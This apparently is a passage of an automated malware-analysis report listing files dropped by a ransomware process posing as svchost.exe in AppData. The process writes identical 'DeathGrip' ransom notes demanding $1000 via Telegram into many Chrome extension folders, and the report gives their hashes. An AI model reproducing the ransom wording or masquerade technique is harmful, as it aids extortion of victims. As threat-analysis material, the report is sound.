                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
